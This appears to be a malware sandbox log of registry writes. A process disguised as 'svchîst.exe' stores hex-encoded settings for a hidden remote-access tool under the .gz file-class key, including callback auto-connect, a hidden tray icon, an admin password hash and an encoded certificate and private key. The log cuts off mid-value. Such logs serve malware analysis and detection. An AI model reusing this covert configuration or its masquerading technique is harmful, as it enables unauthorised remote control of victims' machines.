Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e66616c73653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600390031003100300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00 C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e747275653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3636302d3439362d3234362d3436323c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223639313130223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465a6e565657564a36515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c4a484f58525a563278315355633161474a585657646a4d3278365a45645764456c49546d786a626c70775933704661553144515564424d5656465158643357677053527a6c305756647364556c484e5768695631566e597a4e73656d5248566e524a534535735932356163474e3651575647647a4235545770424d453155593364505645457a5456524b59555a334d48704e616b4577436b3155555864505645457a5456524b5955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73525749794d576868567a526e596d314764467054516e6f4b5a56684f4d4670584d47646a4d6c5a355a473173656b31545358644a51566c45566c465252455243624556694d6a466f595663305a324a74526e526155304a365a56684f4d4670584d47646a4d6c5a355a4731736567704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a3074445156464651573147616b564e64546c6965554e316545316f5131426e55793947436d31736345525a53466455596e5a555a47393463484a4362474a306457684f5546464e6546677a56484a615757517a5133557955545a764d31524b5a4868755a7a42336257633056446c334d55465652564e6c6433674b554768564d6b55325131524b54306334536e464356566b30543346434b31646e564778685545707356554d7762465a6f636b706f4d4446314f5535506157633357565a34646d3134626d4a735258457a544535585651704d4d7a42686257746e5431567a595464494d574a5464334251576c523352564a464f45684862455a4a6158467851585a6e4e6b74734e335a52546a6c556257354261545242617a524f4d6c52745745356a54303558436e6c6b57466379656b45784d466431576b6c7461464930547a427655476476557a4e694e4646496557647653544254597a5a4c51314130576d645165464278656c4e465a6b565057474e6d5333677a656e4e6e616c454b57454e595247703359314530527a565859334e7852336c334e5755354d324a50575546444d31465865557843536d6470553346705746565163315535547a4a6a526d784c5a6d786b556b4e535746687a655452516177706a55556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b4652516c4d7a5a6e55304e6b6833526e524c553349304c305a79535531334e444e6155336c465a545247436b4e6b597a4a765a335245566a45344d6e4d3553585671646d7378566c6c56576a646b656e4a684d4535566333647864554a464d485657544555335446564a596e526e4e7a457952555a5553574a7651584d315a6b6b4b536e70614f444533535446574e45787554454531624646534f44686b623278614d43387755324a4656464671566d64336430743053575275616c64694e6d6c70575534325545394255564679526d4e7659576f7a4f51704d63456c364d7a5252555546324d32396a5a6b6733655538325555707a645578355369395155556732576d784554544e515a6b686c52474651596b5247555535484e6a45795131565352576c504e316c5257566c6f436c7031593268345a4841345647315356544a6e5348424c5269744a57555248626c6c4f59565a59627a4d3254554a334e584e4751315a465656677855445935595452355432394a566e4e4c596d685a5a476f76526d6f4b6432744d6157314d625556334e444658516b677a56584e6a655868455355387954576c58654777725a546476534442354d475a465530314e59576c4c524746325a32314355533878516b674b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a5355563255556c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746a6432646e553270425a3056425157394a516b465251316c58545646354e7a46325355733352586b4b52556b72516b7734563246586130356e5a46704f64546c4f4d6d704862584e48566e55794e6b55774f554636526d5a6b5433527361444e6a537a6461524846715a4531734d30646c524652445955526f55444e455651704355564a4b4e3052464b305a5557565276536b31724e474a3362573947556d706e4e6d39494e57464354315a764f47315755557854566c644863323149564663334d44413253305230614668484b324a485a485656436c4e7959334d78576c46325a6c4a7859564e424e564e34636e4e6d566e524d5132733562464242556b565564324e685656567053334676517974456233465964546c424d7a465059574e44544764445647637a576b384b576d4d78647a5178596b6f785a474a6954555259556d453161326c68526b686e4e314e6e4b304e6f544752326145466d53304e6e616c4a4b656d39765353396f62